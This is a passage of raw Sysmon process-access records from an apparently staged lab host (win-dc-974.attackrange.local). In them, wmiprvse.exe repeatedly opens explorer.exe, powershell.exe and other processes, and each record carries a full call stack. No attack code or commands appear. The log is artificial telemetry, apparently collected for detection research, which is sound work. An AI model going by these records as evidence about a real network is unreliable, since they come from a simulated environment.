ystem32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246686Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246685Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246684Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246683Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246682Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246681Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246680Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246679Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246678Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246677Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246676Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246675Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246674Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246673Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246672Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52880AC5BB305E5D72A9423F3654427D,SHA256=B5F5A0DA247A2C29A6E49E21C36FFCE0C49FD6DC1F688D67972E94154587ECB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.312{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 